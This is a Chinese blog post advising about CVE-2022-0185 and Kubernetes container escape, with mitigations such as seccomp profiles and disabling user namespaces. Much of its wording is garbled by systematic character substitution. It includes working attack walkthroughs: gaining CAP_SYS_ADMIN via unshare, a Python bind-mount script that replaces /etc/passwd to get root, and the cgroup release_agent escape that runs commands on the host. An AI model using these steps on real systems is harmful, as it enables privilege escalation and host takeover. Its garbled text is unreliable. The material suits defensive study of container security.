关于云计算:高危Kubernetes-新型容器逃逸漏洞预警

作者：米开朗基杨，KubeSphere 布道师，云原生重度感染者

2022 年 1 月 18 日，Linux 保护人员和供应商在 Linux 内核（5.1-rc1+）文件系统上下文性能的 legacy_parse_param 函数中发现一个堆缓冲区溢出破绽，该破绽的 ID 编号为 CVE-2022-0185，属于高危破绽，重大等级为 7.8。

该破绽容许在内核内存中进行越界写入。利用这个破绽，无特权的攻击者能够绕过任何 Linux 命名空间的限度，将其权限晋升到 root。例如，如果攻击者渗透到你的容器中，就能够从容器中逃逸，晋升权限。

该破绽于 2019 年 3 月被引入 Linux 内核 5.1-rc1 版本。1 月 18 日公布的补丁修复了这个问题，倡议所有 Linux 用户下载并装置最新版本的内核。

该破绽是由文件系统上下文性能（fs/fs_context.c）的 legacy_parse_param 函数中发现的整数下溢条件引起的。文件系统上下文 的性能是创立用于挂载和从新挂载文件系统的超级块，超级块记录了一个文件系统的特色，如块和文件大小，以及任何存储块。

通过向 legacy_parse_param 函数发送超过 4095 字节的输出，便能够绕过输出长度检测，导致越界写入，触发该破绽。攻击者能够利用此破绽将恶意代码写入内存的其余局部，导致系统解体，或者能够执行任意代码以晋升权限。

legacy_parse_param 函数的输出数据是通过 fsconfig 零碎调用增加的，以用于配置文件系统的创立上下文（如 ext4 文件系统的超级块）。

// 应用 fsconfig 零碎调用增加由 val 指向的以空字符（NULL）结尾的字符串
fsconfig(fd, FSCONFIG_SET_STRING, "\x00", val, 0);

要应用 fsconfig 零碎调用，非特权用户必须至多在其以后命名空间中具备 CAP_SYS_ADMIN 特权。这意味着如果用户能够进入另一个具备这些权限的命名空间，则足以利用此破绽。

如果非特权用户无奈取得 CAP_SYS_ADMIN 权限，攻击者能够通过 unshare(CLONE_NEWNS|CLONE_NEWUSER) 零碎调用取得该权限。Unshare 零碎调用能够让用户创立或克隆一个命名空间或用户，从而领有进行进一步攻打所需的必要权限。这种技术对于应用 Linux 命名空间来隔离 Pod 的 Kubernetes 和容器世界十分重要，攻击者齐全能够在容器逃逸攻打中利用这一点，一旦胜利，攻击者便能够取得对主机操作系统和零碎上运行的所有容器的齐全管制权限 ，从而进一步攻打内部网段的其余机器， 甚至能够在 Kubernetes 集群中部署歹意容器。

发现该破绽的钻研团队于 1 月 25 日在 GitHub 上公布了利用该破绽的代码和概念证实。

Docker 和其余容器运行时默认都会应用 Seccomp 配置文件来阻止容器中的过程应用危险的零碎调用，以爱护 Linux 命名空间边界。

Seccomp（全称：secure computing mode）在 2.6.12 版本（2005 年 3 月 8 日）中引入 Linux 内核，将过程可用的零碎调用限度为四种：read，write，_exit，sigreturn。最后的这种模式是白名单形式，在这种平安模式下，除了已关上的文件描述符和容许的四种零碎调用，如果尝试其余零碎调用，内核就会应用 SIGKILL 或 SIGSYS 终止该过程。

然而 Kubernetes 默认状况下并不会应用任何 Seccomp 或 AppArmor/SELinux 配置文件来限度 Pod 的零碎调用，这就很危险了，Pod 中的过程能够自在拜访危险的零碎调用，伺机取得必要的特权（例如 CAP_SYS_ADMIN），以便进一步攻打。

咱们先来看一个 Docker 的例子，在规范的 Docker 环境中，unshare 命令是无奈应用的，Docker 的 Seccomp 过滤器阻止了这个命令应用的零碎调用。

$ docker run --rm -it alpine /bin/sh
/ # unshare
unshare: unshare(0x0): Operation not permitted

再来看下 Kubernetes 的 Pod：

$ kubectl run --rm -it test --image=ubuntu /bin/bash
If you don't see a command prompt, try pressing enter.
root@test:/# lsns | grep user
4026531837 user        3   1 root /bin/bash
root@test:/#
root@test:/# apt update && apt install -y libcap2 libcap-ng-utils
root@test:/# ......
root@test:/# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap

能够看到 Pod 中的 root 用户并没有 CAP_SYS_ADMIN 能力，但咱们能够通过 unshare 命令来获取 CAP_SYS_ADMIN 能力。

root@test:/# unshare -Urm
#
# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap
1     265   root        sh                full
# lsns | grep user
4026532695 user        3   265 root -sh

那么领有了 CAP_SYS_ADMIN 能够做啥呢？这里给出两个示例，展现如何利用 CAP_SYS_ADMIN 来对系统进行浸透。

上面这段骚操作能够将主机中的普通用户间接提权为 root 用户。

先给 python3 赋予 CAP_SYS_ADMIN 能力（留神，不能对软链接进行操作，只能操作原文件）。

$ which python3
/usr/bin/python3

$ ll /usr/bin/python3
lrwxrwxrwx 1 root root 9 Mar 13  2020 /usr/bin/python3 -> python3.8*

$ setcap CAP_SYS_ADMIN+ep /usr/bin/python3.8
$ getcap /usr/bin/python3.8
/usr/bin/python3.8 = cap_sys_admin+ep

创立一个普通用户。

$ useradd test -d /home/test -m

而后切换到普通用户，并进入用户 home 目录。

$ su test
$ cd ~

将 /etc/passwd 复制到当前目录，并将 root 用户的明码改完 “password“。

$ cp /etc/passwd ./
$ openssl passwd -1 -salt abc password
$1$abc$BXBqpb9BZcZhXLgbee.0s/

# 将第一行的 root:x 改为 root:$1$abc$BXBqpb9BZcZhXLgbee.0s/
$ head -2 passwd
root:$1$abc$BXBqpb9BZcZhXLgbee.0s/:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

将批改后的 passwd 文件挂载到 /etc/passwd。

# cat mount-passwd.py
from ctypes import *
libc = CDLL("libc.so.6")
libc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p)
MS_BIND = 4096
source = b"/home/test/passwd"
target = b"/etc/passwd"
filesystemtype = b"none"
options = b"rw"
mountflags = MS_BIND
libc.mount(source, target, filesystemtype, mountflags, options)

$ python3 mount-passwd.py

最初就是见证奇观的时刻！！！间接切换到 root 用户，并输出明码 “password”。

$ su root
Password: 
root@coredns:/home/test#

好神奇，切换到 root 用户了。。。

来看看是不是真的取得了 root 的权限吧：

$ find / -name "*flag*" 2>/dev/null
/sys/kernel/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/block/vdb/hctx0/flags
/sys/kernel/debug/block/vda/hctx0/flags
/sys/kernel/debug/block/loop7/hctx0/flags
/sys/kernel/debug/block/loop6/hctx0/flags
/sys/kernel/debug/block/loop5/hctx0/flags
/sys/kernel/debug/block/loop4/hctx0/flags
/sys/kernel/debug/block/loop3/hctx0/flags
/sys/kernel/debug/block/loop2/hctx0/flags
/sys/kernel/debug/block/loop1/hctx0/flags
/sys/kernel/debug/block/loop0/hctx0/flags
....

$ cat /sys/kernel/debug/block/vdb/hctx0/flags
alloc_policy=FIFO SHOULD_MERGE

嗯哼，是 root 没错了。

最初记得将 /etc/passwd 卸载哦。

$ umount /etc/passwd

所以，零碎重启工程师（System Reboot Engineer）们，连忙看看你们调配给其他人的普通用户有没有 CAP_SYS_ADMIN 能力吧~~

再来看一个容器的例子，上面这段骚操作能够让你 在容器中获取到主机正在运行的所有过程。

咱们不须要应用 --privileged 参数来运行特权容器，那样就没意思啦。

$ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

接下来在容器中执行上面的命令，最终的成果是在主机上执行 ps aux 命令，并将其输入保留到容器中的 /output 文件。

# Mounts the RDMA cgroup controller and create a child cgroup
# This technique should work with the majority of cgroup controllers
# If you're following along and get"mount: /tmp/cgrp: special device cgroup does not exist"# It's because your setup doesn't have the RDMA cgroup controller, try change rdma to memory to fix it
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# Finds path of OverlayFS mount for container
# Unless the configuration explicitly exposes the mount point of the host filesystem
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Sets release_agent to /path/payload
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Creates a payload
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
# By creating a /bin/sh process and writing its PID to the cgroup.procs file in "x" child cgroup directory
# The script on the host will execute after /bin/sh exits 
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output

最终你能够在容器中看到主机中运行的所有过程：

root@0c84f7587629:/# cat /output
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.3 172704 13148 ?        Ss    2021 131:32 /sbin/init nopti
root           2  0.0  0.0      0     0 ?        S     2021   0:18 [kthreadd]
root           3  0.0  0.0      0     0 ?        I<    2021   0:00 [rcu_gp]
root           4  0.0  0.0      0     0 ?        I<    2021   0:00 [rcu_par_gp]
root           6  0.0  0.0      0     0 ?        I<    2021   0:00 [kworker/0:0H-kblockd]
root           8  0.0  0.0      0     0 ?        I<    2021   0:00 [mm_percpu_wq]
root           9  0.0  0.0      0     0 ?        S     2021  18:36 [ksoftirqd/0]
root          10  0.0  0.0      0     0 ?        I     2021 262:22 [rcu_sched]
root          11  0.0  0.0      0     0 ?        S     2021   3:06 [migration/0]
root          12  0.0  0.0      0     0 ?        S     2021   0:00 [idle_inject/0]
root          14  0.0  0.0      0     0 ?        S     2021   0:00 [cpuhp/0]
root          15  0.0  0.0      0     0 ?        S     2021   0:00 [cpuhp/1]
......

这些命令的具体含意我就不解释啦，感兴趣的能够本人对照正文钻研一下。

能够确定的是，CAP_SYS_ADMIN 能力为攻击者提供了更多的可能性，不论是在宿主机还是在容器中，尤其是容器环境，如果咱们因为不可抗因素无奈降级内核，就要寻求其余的解决方案。

从 v1.22 版本开始，Kubernetes 便能够应用 SecurityContext 将默认的 Seccomp 或 AppArmor 配置文件增加到资源对象中，以爱护 Pod、Deployment、Statefulset、Daemonset 等等。尽管这个性能目前处于 Alpha 阶段，但用户能够增加本人的 Seccomp 或 AppArmor 配置文件，并在 SecurityContext 中定义它。例如：

# pod-test.yaml
apiVersion: v1
kind: Pod
metadata:
  name: protected
spec:
  containers:
    - name: protected
      image: ubuntu
      command:
      - sleep
      - infinity
      securityContext:
        seccompProfile:
          type: RuntimeDefault

创立 Pod 后，尝试应用 unshare 取得 CAP_SYS_ADMIN 能力。

$ kubectl exec -it protected -- bash
root@protected:/#
root@protected:/# unshare -Urm
unshare: unshare failed: Operation not permitted

输入结果显示，unshare 零碎调用被胜利阻止了，攻击者便无奈利用该能力进行攻打。

还有一种计划是从主机层面禁止用户应用 user namespace 的能力，不须要重启零碎。例如，在 Ubuntu 中，只须要执行上面两行命令便可即时失效，并且重启零碎后也会失效。

$ echo "kernel.unprivileged_userns_clone=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf

如果是 Red Hat 系的零碎，能够执行上面的命令来达到同样的成果。

$ echo "user.max_user_namespaces=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf

总结一下对于该破绽的解决倡议：

如果你的环境能够承受给内核打补丁，也能承受重启零碎，最好打补丁，或者降级内核。
缩小应用可能拜访 CAP_SYS_ADMIN 的特权容器。
对于没有特权的容器，确保有一个 Seccomp 过滤器来阻止其对 unshare 的调用，以缩小危险。Docker 没问题，Kubernetes 须要额定操作。
将来能够为 Kubernetes 集群中的所有工作负载启用 Seccomp 配置文件。目前该性能还处于 Alpha 阶段，须要通过个性开关（feature gate）开启。
在主机层面禁止用户应用 user namespace 的能力。

容器环境盘根错节，特地是像 Kubernetes 这样的散布式调度平台，每一个环节都有本人的生命周期和攻击面，很容易暴露出平安危险，容器集群管理员必须留神每一处细节的平安问题。总的来说，绝大多数状况下容器的安全性都取决于 Linux 内核的安全性，因而，咱们须要时刻关注任何平安问题，并尽快施行对应的解决方案。

CVE-2022-0185: Kubernetes Container Escape Using Linux Kernel Exploit
CVE-2022-0185: Detecting and mitigating Linux Kernel vulnerability causing container escape
Excessive Capabilities
CAP_SYS_ADMIN

本文由博客一文多发平台 OpenWrite 公布！

关于云计算:高危Kubernetes-新型容器逃逸漏洞预警

破绽细节

PoC

普通用户提权为 root 用户！

容器中查看主机所有过程！

解决方案

容器层面

主机层面

写在最初

参考资料

Just My Socks（注册教程内含优惠码）

关于云计算:高危Kubernetes-新型容器逃逸漏洞预警

破绽细节

PoC

普通用户提权为 root 用户！

容器中查看主机所有过程！

解决方案

容器层面

主机层面

写在最初

参考资料

Just My Socks（注册教程 内含优惠码）

Just My Socks（注册教程内含优惠码）